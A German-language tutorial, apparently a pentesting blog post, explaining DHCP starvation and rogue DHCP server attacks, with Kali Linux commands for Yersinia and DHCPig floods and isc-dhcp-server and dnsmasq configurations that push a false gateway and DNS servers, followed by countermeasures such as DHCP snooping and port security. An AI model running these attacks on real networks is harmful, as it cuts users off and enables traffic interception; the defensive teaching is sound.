DHCP Starvation Attack und Rogue DHCP Server: Eine Übersicht
DHCP Starvation Attack (Adresspool-Auszehrung)
Der DHCP Starvation Attack zielt darauf ab, den Adresspool eines DHCP-Servers zu erschöpfen, sodass legitime Clients keine IP-Adressen mehr erhalten können.
Funktionsweise
Ein Angreifer sendet eine große Anzahl gefälschter DHCP-Anfragen an den Server. Jede Anfrage verwendet eine unterschiedliche gefälschte MAC-Adresse. Dadurch weist der Server jeder Anfrage eine IP-Adresse zu, bis sein Adresspool erschöpft ist.
Werkzeuge und Befehle
In Kali Linux können verschiedene Tools für diesen Angriff verwendet werden, beispielsweise Yersinia oder DHCPig.
Verwendung von Yersinia
Yersinia ist ein mächtiges Framework für Angriffe auf Netzwerkprotokolle.
Installation (falls nicht vorhanden):
sudo apt-get update
sudo apt-get install yersiniaStarten von Yersinia im interaktiven Modus:
sudo yersinia -IIm interaktiven Modus:
- Wählen Sie mit den Pfeiltasten DHCP aus.
- Drücken Sie Shift + A, um die verfügbaren Angriffe anzuzeigen.
- Wählen Sie “DHCP Discover flood” und bestätigen Sie.
Ausführung im Kommandozeilenmodus:
sudo yersinia dhcp -attack 1 -interface eth0Ersetzen Sie eth0 durch die entsprechende Netzwerkschnittstelle.
Verwendung von DHCPig
DHCPig ist ein Tool speziell für DHCP Starvation Attacken.
Installation:
sudo apt-get install python-scapy
git clone https://github.com/kamorin/DHCPig.git
cd DHCPigAusführung:
sudo python DHCPig.py -i eth0Rogue DHCP Server
Ein Rogue DHCP Server ist ein unerlaubter DHCP-Server im Netzwerk, der falsche oder manipulierte Netzwerkdaten an Clients verteilt.
Funktionsweise
Ein Angreifer startet einen eigenen DHCP-Server im Netzwerk. Dieser verteilt anfragenden Clients gefälschte Konfigurationsdaten, wie etwa falsche IP-Adressen, Gateways oder DNS-Server. Dies kann zu Netzwerkstörungen führen oder dazu genutzt werden, Datenverkehr umzuleiten (Man-in-the-Middle-Angriff).
Werkzeuge und Befehle
In Kali Linux kann man z.B. isc-dhcp-server oder dnsmasq verwenden, um einen Rogue DHCP Server einzurichten.
Verwendung von isc-dhcp-server
Installation:
sudo apt-get update
sudo apt-get install isc-dhcp-serverKonfiguration:
Bearbeiten Sie die Datei /etc/dhcp/dhcpd.conf und fügen Sie Folgendes hinzu:
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.1.0 netmask 255.255.255.0 {
range 192.168.1.100 192.168.1.200;
option subnet-mask 255.255.255.0;
option routers 192.168.1.1; # Falsches Gateway
option domain-name-servers 8.8.8.8, 8.8.4.4; # Falsche DNS-Server
}Starten des DHCP-Servers:
sudo systemctl restart isc-dhcp-serverÜberprüfen Sie den Status:
sudo systemctl status isc-dhcp-serverVerwendung von dnsmasq
Installation:
sudo apt-get install dnsmasqKonfiguration:
Bearbeiten Sie die Datei /etc/dnsmasq.conf:
interface=eth0
dhcp-range=192.168.1.100,192.168.1.200,12h
dhcp-option=3,192.168.1.1 # Falsches Gateway
dhcp-option=6,8.8.8.8,8.8.4.4 # Falsche DNS-ServerStarten des Dienstes:
sudo systemctl restart dnsmasqGegenmaßnahmen und Schutzmechanismen
Schutz vor DHCP Starvation Attacks
- Port Security auf Switches aktivieren: Begrenzen Sie die Anzahl der MAC-Adressen pro Port, um MAC-Flooding zu verhindern.
- DHCP Snooping nutzen: Konfigurieren Sie Switches so, dass sie nur DHCP-Antworten von autorisierten Servern zulassen.
- ARP Inspection: Überprüfen Sie ARP-Pakete auf ihre Gültigkeit.
Schutz vor Rogue DHCP Servern
- DHCP Snooping verwenden: Switches können so konfiguriert werden, dass sie DHCP-Antworten nur von vertrauenswürdigen Ports akzeptieren.
- Netzwerksegmentierung: Trennen Sie das Netzwerk in VLANs, um den Einflussbereich zu reduzieren.
- Regelmäßige Netzwerkscans: Überwachen Sie das Netzwerk auf unbekannte DHCP-Server, z.B. mit Tools wie dhcp_probe.
Tags
DHCPNetzwerksicherheitPentestingKaliLinuxITSecurityDHCPStarvationRogueDHCPServer